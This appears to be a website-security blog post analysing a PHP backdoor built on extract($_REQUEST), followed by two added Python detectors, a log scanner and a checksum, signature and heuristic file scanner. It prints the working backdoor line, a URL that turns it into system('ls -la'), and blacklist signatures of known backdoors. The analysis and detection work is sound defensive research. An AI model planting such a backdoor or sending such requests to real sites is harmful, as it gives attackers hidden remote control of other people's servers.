PHP Backdoors: Hidden With Clever Use of the Extract Function
February | Daniel Cid
When a site gets compromised, one thing we know for sure is that attackers love to leave malware that lets them get back into the site. This type of malware is called a backdoor, because it allows remote control of a compromised website without going through the appropriate authentication methods. You can update your site, change passwords, and follow all of your admin procedures, and the backdoor would still be there, giving an attacker unexpected access.
Backdoors are also very hard to find because they don't have to be linked directly from the website, they can be very small, and they are easily confused with "normal" code. Some of them have passwords, some are heavily encrypted/encoded, and they can be anywhere on your site: in the file system or in the database.
We have written extensively on website backdoors (generally in PHP) that allow for continuous reinfections and control of hacked websites.
You can read more about backdoors at these links:
- Ask Sucuri: What about the backdoors?
- Ask Sucuri: Non-alphanumeric backdoors
- Hiding backdoors using cron
If you search for "backdoor" on our blog, you'll find dozens of posts specifically on the subject.
PHP Extract Backdoor
As you can imagine, backdoors are something that gets us very interested, and they are a big part of our work. If we clean up a site and miss just one backdoor, it means the site can get reinfected.
Recently, while working on a client website, one of our security analysts, Ben Martin, found a very interesting backdoor that leverages the extract PHP function. The backdoor was hidden in a file called phpinfo.php:
@extract($_REQUEST); @die($ctime($atime)); // every request parameter becomes a PHP variable, then $ctime is called with $atime as its argument
As you can see, it doesn't look very suspicious. It doesn't have any "eval", "exec", "system", "assert", "preg_replace" (with /e) or any other common function that allows for code execution. This makes most signature-based malware detection and removal solutions useless. They won't find anything.
How can someone execute code by just leveraging extract, you ask? The extract manual page explains what it does:
extract - Import variables into the current symbol table from an array
Basically, it takes whatever array entries you have and creates variables for them. If you are thinking that doesn't look too bad or dangerous, in this piece of code it certainly is.
It is extracting any content sent via GET or POST requests and creating variables for it. That means that in the next part of the code, where it executes 'die' (exit) on $ctime($atime), it's actually executing whatever the attacker sends as "ctime", with "atime" as the argument.
Running Commands Via The Backdoor
Let me give an example, which may make it a bit easier to follow. Let's say I am a bad guy and I want to execute ls -la to list all the contents of a directory on a site I just hacked and uploaded this backdoor to. All I need to do is visit this URL using any browser:
site.com/phpinfo.php?ctime=system&atime=ls-la
The extract function takes these variables and turns @die($ctime($atime)) into @die(system("ls -la")). See how powerful it is?
Now you can take the ls and turn it into a cat, or echo, and many other commands to modify files. It's basically a full shell in there.
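Because the function name travels in the query string, the GET form of this attack is visible in ordinary web server logs. The following is an added example, not code from the original post or from Sucuri: it parses a few constructed Apache combined-format log lines (the addresses, timestamps and paths are invented) and flags any request in which a parameter value is the bare name of a PHP function that executes commands or code, which is exactly what the phpinfo.php backdoor needs in "ctime". The set CODE_EXEC_FUNCS and the log format are assumptions for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log lines in Apache combined format; not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Feb/2014:10:01:22 +0000] "GET /index.php?page=about HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Feb/2014:10:02:07 +0000] "GET /phpinfo.php?ctime=system&atime=ls%20-la HTTP/1.1" 200 812 "-" "curl/7.35.0"
198.51.100.7 - - [10/Feb/2014:10:03:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Feb/2014:10:04:11 +0000] "GET /phpinfo.php?ctime=passthru&atime=id HTTP/1.1" 200 96 "-" "curl/7.35.0"
"""

# PHP functions that run shell commands or evaluate code when called by name.
# Assumed list for the example; extend it to match your own policy.
CODE_EXEC_FUNCS = {
    "system", "exec", "passthru", "shell_exec", "popen", "proc_open",
    "assert", "create_function",
}

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def parse_line(line):
    """Return a dict with ip, path, decoded query params and status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qsl percent-decodes values, so "ls%20-la" becomes "ls -la".
    params = parse_qsl(parts.query, keep_blank_values=True)
    return {
        "ip": m.group("ip"),
        "path": parts.path,
        "params": params,
        "status": int(m.group("status")),
    }


def find_function_smuggling(log_text):
    """Flag requests where a query parameter value names a code-execution function.

    Each finding records the parameter that carried the function name and the
    remaining parameters, which in the extract() backdoor hold the argument.
    """
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            func = value.strip().lower()
            if func in CODE_EXEC_FUNCS:
                findings.append({
                    "ip": rec["ip"],
                    "path": rec["path"],
                    "param": name,
                    "function": func,
                    "other_params": {n: v for n, v in rec["params"] if n != name},
                })
    return findings


if __name__ == "__main__":
    for hit in find_function_smuggling(SAMPLE_LOG):
        print(f'{hit["ip"]} {hit["path"]} {hit["param"]}={hit["function"]} {hit["other_params"]}')
```

Two hits come back for the constructed log, both against /phpinfo.php from the same client. Note the blind spot: the backdoor reads $_REQUEST, so the same call can arrive in a POST body (and, depending on PHP's request_order setting, in a cookie), neither of which a standard access log records. Log-based detection therefore complements, but does not replace, scanning the file system for the backdoor itself.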
Protecting and Detecting Backdoors
As you can see, finding them is very hard. But there are some techniques that work very well:
- Whitelisting: we know what the good files look like. We have a large checksum set of all the core files used in WordPress, Joomla, osCommerce, Wiki, etc. We also have checksums for the most popular plugins, modules, extensions and themes. Do you know what that gives us? It gives us a verification method for the core files: a way to determine if they were modified or new files were added, and we can safely validate the good ones.
- Blacklisting: we also have a list of thousands of backdoors and their variations that we have collected over the last few years.
- Anomaly checks: when a file is not in our whitelist (core files) and isn't in our blacklist, we run anomaly checks. In these checks all the functions/variables in a file are analyzed and manually inspected to see if they form a backdoor. If they do, we modify our blacklists to catch it in the future. If not, it's another file added to our whitelist.
As you can see, we use more than one method to detect and protect, mixing whitelisting, blacklisting and our own manual analysis to find all the backdoors on a site. If you are trying to clean a compromised site by yourself, we recommend first overwriting all the files you can (core files, plugins, etc.). Whatever is left, you have to analyze manually, file by file, to make sure it is clean.
What do you think? We would love to hear your ideas or methods for checking for backdoors.
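The three layers above can be wired together in a small scanner. This is an added example, not Sucuri's tooling or code from the original post: it classifies every PHP file of a site as clean core (checksum matches a known-good file), modified core (path known, checksum differs), blacklisted (contains a known backdoor signature), suspicious (trips an anomaly heuristic), or unknown (needs manual review). The "core" contents, the blacklist entries and the sample site tree are all constructed for the example; the anomaly heuristics target the extract() trick specifically, so a variant of the backdoor with different variable names, which the signature would miss, is still flagged.

```python
import hashlib
import re
from pathlib import Path


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed stand-ins for pristine core files (hypothetical contents).
# A real whitelist holds vendor checksums for every core file of each release.
CORE_ORIGINALS = {
    "wp-includes/version.php": b"<?php\n$wp_version = '3.8';\n",
    "wp-includes/class-http.php": (
        b"<?php\nclass WP_Http {\n"
        b"    function request($url) { return wp_remote_get($url); }\n}\n"
    ),
}
WHITELIST = {path: sha256_hex(body) for path, body in CORE_ORIGINALS.items()}

# Constructed blacklist: byte signatures of backdoor constructs already known.
# The exact extract() backdoor from the post is added here after discovery.
BLACKLIST = [
    b"eval(base64_decode(",
    b"@extract($_REQUEST); @die($ctime($atime));",
]

# Anomaly heuristics: request data turned into variables, then a variable
# called as a function. Each is a hint for manual review, not proof.
EXTRACT_SUPERGLOBAL = re.compile(rb"\bextract\s*\(\s*\$_(?:REQUEST|GET|POST|COOKIE)\b", re.I)
VARIABLE_CALL = re.compile(rb"\$[A-Za-z_]\w*\s*\(\s*\$[A-Za-z_]\w*")
SUPERGLOBAL_CALL = re.compile(rb"\$_(?:REQUEST|GET|POST|COOKIE)\s*\[[^\]]*\]\s*\(", re.I)


def anomaly_reasons(body: bytes) -> list:
    """Return the list of heuristics a file trips (empty if none)."""
    reasons = []
    if EXTRACT_SUPERGLOBAL.search(body):
        reasons.append("extract() of a request superglobal")
    if VARIABLE_CALL.search(body):
        reasons.append("variable function call with variable argument")
    if SUPERGLOBAL_CALL.search(body):
        reasons.append("request parameter used directly as a function name")
    return reasons


def classify(path: str, body: bytes) -> str:
    """Whitelist first, then blacklist, then anomaly checks, else manual review."""
    if path in WHITELIST:
        return "clean-core" if sha256_hex(body) == WHITELIST[path] else "modified-core"
    if any(sig in body for sig in BLACKLIST):
        return "blacklisted"
    reasons = anomaly_reasons(body)
    if reasons:
        return "suspicious: " + "; ".join(reasons)
    return "unknown-review"


def scan_tree(files: dict) -> dict:
    """Classify a {relative_path: bytes} mapping of PHP files."""
    return {path: classify(path, body) for path, body in files.items()}


def load_tree(root: str) -> dict:
    """Read every .php file under root into the mapping scan_tree expects."""
    base = Path(root)
    return {p.relative_to(base).as_posix(): p.read_bytes()
            for p in base.rglob("*.php") if p.is_file()}


# Constructed site tree: one pristine core file, one tampered core file, one
# ordinary plugin, one file matching a blacklist signature, and a variant of
# the extract() backdoor whose variable names differ from the signature.
SAMPLE_SITE = {
    "wp-includes/version.php": CORE_ORIGINALS["wp-includes/version.php"],
    "wp-includes/class-http.php": CORE_ORIGINALS["wp-includes/class-http.php"] + b"// tampered\n",
    "wp-content/plugins/contact/contact.php": (
        b"<?php\nfunction contact_init() { add_action('init', 'contact_setup'); }\n"
    ),
    "wp-content/uploads/cache.php": b"<?php eval(base64_decode('...'));\n",
    "phpinfo.php": b"<?php @extract($_REQUEST); @die($mtime($size));\n",
}


if __name__ == "__main__":
    for path, verdict in sorted(scan_tree(SAMPLE_SITE).items()):
        print(f"{verdict:<60} {path}")
```

Order matters: checksum verification runs before the signature and heuristic checks, so a pristine core file is never reported as suspicious even if it legitimately calls a variable function, while a tampered core file is reported regardless of what was inserted. Everything that falls through to "unknown-review" is the manual-analysis pile the post describes; a file that tripped a heuristic is reviewed first, and whatever turns out to be a backdoor becomes a new blacklist entry.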